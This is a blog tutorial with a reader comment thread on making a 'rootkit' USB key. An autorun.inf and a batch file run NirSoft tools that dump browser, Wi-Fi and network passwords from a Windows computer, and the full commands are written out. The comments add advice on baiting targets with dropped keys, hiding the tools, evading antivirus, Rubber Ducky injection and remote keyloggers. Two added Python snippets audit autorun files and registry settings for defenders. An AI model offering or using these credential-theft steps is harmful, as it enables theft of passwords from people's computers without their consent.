Last updated: May 7, 2022
Today we are going to see how to create a USB key that recovers passwords from a computer. This USB key runs automatically and recovers most passwords stored on a computer.
It is really very useful, especially when you have lost your passwords.
To create a rootkit USB key, follow the steps below:
Step 1
We will first download some tools that allow us to recover the passwords of the most common applications. All these applications come from the Nirsoft site (http://www.nirsoft.net/).
Next, we are going to place all the .exe files on our USB key.
Step 2
Now you have to create a file named launch.bat, which will automatically open the password recovery programs and store the results in a text file.
To do this, create a new text document with Notepad or another editor and write the code below.
start WebBrowserPassView.exe /stext folder1/WebBrowserPassView.txt
start WirelessKeyView.exe /stext folder1/WirelessKeyView.txt
start netpass.exe /stext folder1/netpass.txt
Be careful to check that the names of the tools match the names written in the launch.bat file.
At this stage, when launch.bat is executed, these logs will be sent to a folder called folder1. We must therefore create a new folder and name it folder1.
Step 3
Then we will create the file autorun.inf. The autorun.inf file is a text file saved at the root of a storage device (DVD, USB key, etc.) allowing the automatic launch of certain programs when inserting a storage device.
When you insert your USB key, a window usually appears asking what you want to do.
In this window, we are going to create a new option that (once clicked) will recover the passwords from the computer and store them in the folder created in step 2.
To achieve this, open a new text document and insert the following code:
[autorun]
open=launch.bat
ACTION='The name of the new option'
Finally, save the file autorun.inf.
Congratulations! Your USB rootkit is now ready to use; all you have to do is test it.
So to recover passwords for a computer running Windows 7 or Windows 10, you have to manually click on the small program launch.bat.
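Seen from the defender's side, the autorun.inf from Step 3 can be audited before a found drive is trusted. The following is an added example, not code from the original tutorial; the function names, the extension list and the sample file are assumptions constructed for illustration.

```python
import ntpath

# Extensions meaning AutoRun would start a program or script (illustrative list).
EXECUTABLE_EXT = {".bat", ".cmd", ".exe", ".com", ".scr", ".vbs", ".js", ".ps1", ".lnk"}
LAUNCH_KEYS = ("open", "shellexecute")

def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased.

    Lines that appear before any section header are accepted as well,
    so a file whose header is missing is still audited.
    """
    entries, section = {}, "autorun"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip().strip("'\"")
    return entries

def audit_autorun(text):
    """List what the file would launch and the label it shows the user."""
    entries, findings = parse_autorun(text), []
    for key in LAUNCH_KEYS:
        command = entries.get(key, "")
        target = command.split()[0] if command else ""
        if ntpath.splitext(target)[1].lower() in EXECUTABLE_EXT:
            findings.append(f"{key} launches {target}")
    if findings and "action" in entries:
        findings.append(f"AutoPlay label shown to user: {entries['action']!r}")
    return findings

# Constructed sample shaped like the file from Step 3; the label is the one
# suggested in the comments on this page.
SAMPLE = "[autorun]\nopen = launch.bat\nACTION = 'Open the folder and show the files'\n"

if __name__ == "__main__":
    for finding in audit_autorun(SAMPLE):
        print(finding)
```

A friendly label next to a script target is the pattern to look for: the label is what the user sees, the target is what runs.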
Hello, this trick is really interesting and I use it now. However, are there any other programs or applications other than this, such as
WebBrowserPassView,
Network Password Recovery
or WirelessKeyView,
that can retrieve e-mails or other useful information like the router password that I could add to my USB rootkit?
Could you help me with WebBrowserPassView? My username is displayed in the result but not the password. What could the problem be linked to?
please
Hello to all, I tried to create the rootkit but this one does not work. I wondered if it was not because I am on Windows 11.
thank you for your answer 😉
Exactly, this trick is no longer functional on Windows 10 and 11.
Donut, yes disable Windows antivirus
Hello, I tried but it doesn't work. Windows antivirus prevents me from extracting the files because it detects them as viruses. Anyone know what to do?
I followed everything but when I click on launch.bat it just opens the notepad, am I doing it wrong?
Hello, before starting the manipulations I wanted to know if the key once prepared works if it is connected to a mobile phone running Android?
please
No, it only works on Windows.
Hello, Thank you Jagrey,
you may know the equivalent that runs on android please?
Thank you
As always, only Windows users are concerned, I work permanently under Linux so no way to send an execution without my agreement.
Hello, I finished the tutorial, but my rootkit usb key does not work, I would not be able to say why.
I put a screenshot of the files of the USB key; could you tell me if I made a mistake?
Hello Jeremy,
Microsoft has modified the AutoRun function in order to block this type of attack. Now, when connecting removable media, AutoRun is no longer available.
So, to recover computer passwords, you need to manually run the launch.bat file.
hello when I plug my USB key into a computer how do I get it to launch
Hello Sylvain, autorun is no longer available on Windows 7 and 10. With the progression of viruses exploiting the autorun function to install themselves, Microsoft has decided to remove AutoRun from Windows 7 and 10.
So to recover passwords from a computer, you have to manually click on launch.bat.
Hello, when the files open they do not open in the background is there a way to make a command to open in the background?
Try running WebBrowserPassView only.
Hello,
In the part [ACTION: "the name of the new option"], I don't know what to write.
Could you help me please ?
Goods.
Hi
Small question: Is it possible to complete the technique described above according to several points:
– if you want to use the baiting method (the target recovers the “forgotten” USB key and connects it to his machine), then the target by opening the key will see the tools therein and become aware of the deception.
– I may be wrong, but if the target is on mac, then the autorun does not work and it must manually open the file that has the rootkit or the keylogger
– if we proceed remotely (without physical access to the machine), then we must retrieve the information collected remotely too, can the technique presented incorporate a script or other that sends the log containing the information collected by email? (I'm still a beginner, I probably don't have all the knowledge and the appropriate vocabulary yet)
Thank you in advance!
preener ducky-flasher for the usbs plus A payload scripted by ducky toolkit to make a .bin file which will be at the heart of the usb and find you the joy of an injection which works on windows 10 as at the time of windows xp method changes but you will have the same result. Except that in 8 seconds to my chrono your file is stolen good luck
you can be a little more specific because I'm new to this field and I didn't quite understand how to adapt this tutorial to windows 10 :/
Is there a way to make a ducky-flasher preener without buying one?
First it's Rubber Ducky, then if you want to make one you will find several tutorials on youpute, you still need to have a good knowledge of electronics.
To my knowledge the payloads cannot be launched without the admin pass, so that limits its usefulness a lot.
When the autorun.inf Microsoft prevents its operation from win XP too dangerous. (already said)
don't bother with that, forced to launch the batch manually, but without an admin pass, it's dead.
The question is:
How to log in as admin with an inaccessible bios, ie impossible to boot with a key or a CD, and limited rights, ie no access to CMD or regedit and the impossibility of launching any app or script.
The first who finds, I pay a general tour!
Does it work if we insert this usb drive on mac?
Your tutorial is just great, however as I saw in the recurring comments on this subject, I will repeat:
Why most .exe apps launched through the launch.bat file save data in .cfg files and not .txt files?
Thanks in advance for helping us.
And thank you again for this great tutorial 🙂
This issue has appeared with the latest app updates. Try downloading versions 2.11 or later.
Hello, the .txt are not in the folder for chrome and firefox… In fact only WirelessPassView is displayed!
A solution?
This issue has appeared with the latest app updates. Try downloading versions 2.11 or later.
Hello, I am a beginner and I followed this tutorial, and I encounter a problem, after downloading the files and creating the launch.bat and the autorun.inf, when I launch the launch.bat, it opens all the programs then create .cfg files on the key for each of the programs, what should I do? Thank you
This issue has appeared with the latest app updates. Try downloading versions 2.11 or later.
FYI all new versions available on nirsoft do not have commands for auto creation of text files (or any other format)
The problem is that the autorun no longer works! Now Windows blocks them automatically for those coming from a USB key… Any idea?
Thank you very good Tutorial & thanks to @Draytane for the modification
Good continuation the site is great!!
hello and thank you so much for this tutorial! everything works very well but I have to run the .bat by myself because the new option is not displayed… I'm on Windows 8, this may have an impact.. Can someone please enlighten me? thank you !!
I succeeded in everything… In English? normal…
I downloaded all of them from different sites….
Good evening ! Personally, it does not work for mailpv and pspv 🙁
And I wanted to know if it also works on brand and what software should I download for Safari?
top, very good tutorial 🙂 personally I preferred to make one or two alterations, to start I put the exe in a folder named "temp" (for more discretion)
but I left the ini file and the bat in the root.
Then I modified the bat like this:
« mkdir folder
start temp/ChromePass.exe /stext folder/chrome.txt
start temp/iepv.exe /stext folder/iexplorer.txt
start temp/mailpv.exe /stext folder/mail.txt
start temp/mspass.exe /stext folder/mspass.txt
start temp/PasswordFox.exe /stext folder/netpass.txt
start temp/pspv.exe /stext folder/pspv.txt”
like that it creates the folder itself, I find it more practical. but I had to separate myself from the exe which asked for confirmations :,-(
No doubt you only took the language files.
Hello, I would like to know, can we circumvent the problem of anti-virus? That is to say that as soon as I insert my usb key, my pc detects it as malicious and therefore deletes all the files that appear to it to be infected.
Hello!
thank you for your tutorial it really helped me thank you.
I have a very small question that may seem silly to you, but hey, I'm taking the risk 🙂
"The name of the new option" what is it? what should I mark?
thank you in advance and good continuation really great your site.
Hello Prestige,
For the name of the new option; you can choose what you want. You can put for example "Open the folder and show the files"
Hi, I'm back another time. Sorry for the inconvenience but the link is still dead, is there a torrent link or a site to get it? Thank you for your reply !
It works perfectly for me, can you check again? Otherwise you can always download them from the original site: http://www.nirsoft.net/password_recovery_tools.html
it actually works thank you!
Hi, as by chance I have taken the whole pack and I would like to have it back but your link is no longer valid it no longer works, if it is possible to put it back to new
I tried to do it with the tutorial but it gives me errors. Please answer me very quickly. You also told me about remote keyloggers, I would like to know more and know what it is. Thank you in advance and continue like this. It rocks every day, I read your articles and this one is my favorite
answer me quickly !
Hello tristan, nice to see you again! 🙂 you're right the link of the pack is dead, I changed it to another one, you can now download the whole pack as before!
As for Remote keylogger, it is an invisible spyware to monitor all aspects of user activity. It sends to the email address indicated each keystroke typed in a computer and screenshots at regular intervals...
'In the tree structure of the registry go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer], modify the following key, with the value 91 “NoDriveTypeAutoRun”=dword:00000091 finally restart your PC.' Can we make this modification for each pc to which we connect the usb key??
Hi it was to know why when I run the launch.bat manually I got
“ERROR 5: Access denied”?
And also to know why the autorun does not offer "the name of the new option" in the panel that is displayed when you put in the USB key?
thank you so much and I love your tutorials man!
To see the name displayed you must authorize the automatic execution of the autorun.
To enable autorun, Start Menu -> Run -> regedit.exe
You are looking for: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
and change the key value to 91
“NoDriveTypeAutoRun”=dword:00000091
Yes of course, it's the same principle! 🙂
Hi tristan,
It is not possible to send this file automatically by email. The batch is very limited to the set of commands available in cmd.exe, however there are remote keyloggers that allow you to do that!
hello elahmed I would like to know more about what you said about the existence of remote keyloggers please answer me quickly and have a nice day
Hello,
Another thing,
When I try, on win 7 even after I have modified the registry key, I get the autorun window which allows you to choose the type of applications,
so the script does not run automatically !!!
Salam Ahmad,
Most tools are detected as Trojan/Virus (False Alerts)
The question is how can we bypass the antivirus not to detect them!!!
because otherwise, it doesn't matter the function of automating the launches.
Thanks for the tutorial ^^.
AM@
Poy Ahmed,
Thank you very much !
The "%random%" script works fine.
I updated via nirsoft.net and indeed mine was not up to date.
Keep posting your articles, I devour them every time =)
Hi Jerzey,
The first problem is because of the autorun. On some computers autorun is disabled. To activate autorun, go to Start Menu → Run → (type regedit.exe)
In the tree structure of the registry go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer], modify the following key, with the value 91 “NoDriveTypeAutoRun”=dword:00000091 finally restart your PC.
– For the second problem, try to download the latest version of PasswordFox from http://www.nirsoft.net/utils/passwordfox.html
– Finally, to avoid overwriting old files, you can add the “%random%” command to the launch.bat file:
start mspass.exe /stext Mdp/mspass%random%.txt
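The NoDriveTypeAutoRun value quoted in several replies above is a bitmask in which a set bit disables AutoRun for one drive type. The following is an added example, not part of the original thread, that decodes a .reg-style line to show which drive types stay exposed. The function names are hypothetical, the bit meanings follow Microsoft's documented drive-type numbering, and 0xFF as the hardened baseline is the value that disables AutoRun for all drive types.

```python
import re

# A set bit DISABLES AutoRun for that drive type.
DRIVE_TYPE_BITS = {
    0x01: "unknown",
    0x04: "removable (USB keys)",
    0x08: "fixed",
    0x10: "network",
    0x20: "CD-ROM",
    0x40: "RAM disk",
    0x80: "unknown (reserved)",
}
HARDENED = 0xFF  # AutoRun disabled for every drive type

def parse_reg_dword(line, name="NoDriveTypeAutoRun"):
    """Extract the DWORD from a .reg-style line; tolerate typographic quotes."""
    cleaned = line.replace("\u201c", '"').replace("\u201d", '"')
    match = re.search(rf'"{re.escape(name)}"\s*=\s*dword:([0-9a-fA-F]{{1,8}})', cleaned)
    if not match:
        raise ValueError(f"no {name} DWORD in: {line!r}")
    return int(match.group(1), 16)

def autorun_enabled_for(value):
    """Drive types for which AutoRun is still allowed under this mask."""
    return [label for bit, label in DRIVE_TYPE_BITS.items() if not (value & bit)]

def assess(line):
    """Summarise one policy line for a configuration review."""
    value = parse_reg_dword(line)
    return {
        "value": hex(value),
        "autorun_enabled": autorun_enabled_for(value),
        "removable_exposed": not (value & 0x04),
        "hardened": (value & HARDENED) == HARDENED,
    }

# The line as quoted in the replies above, and the hardened value for comparison.
PAGE_LINE = '"NoDriveTypeAutoRun"=dword:00000091'
HARDENED_LINE = '"NoDriveTypeAutoRun"=dword:000000ff'

if __name__ == "__main__":
    for line in (PAGE_LINE, HARDENED_LINE):
        print(assess(line))
```

With 0x91 only the unknown and network bits are set, so removable drives remain exposed; a configuration review should expect 0xFF.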
Hello !
I created this very nice rootkit.
However, here are my observations and problems encountered (hoping you can solve them):
– The autorun + .bat are well established on my usb, however they do not launch by themselves when the usb is inserted, the user of the PC must, in a desired way, click on the launch icon.
– The app for Firefox does not work, however. I always have an error message on all the pc used.
– Would it be possible to add a few lines of code so that the script creates a new text file named for example: MDP1 MDP2 etc etc rather than overwriting the old one each time? (I don't know the prog, nevertheless I could try to do that, I've already done a lot of .bat but I have to play with the command books :))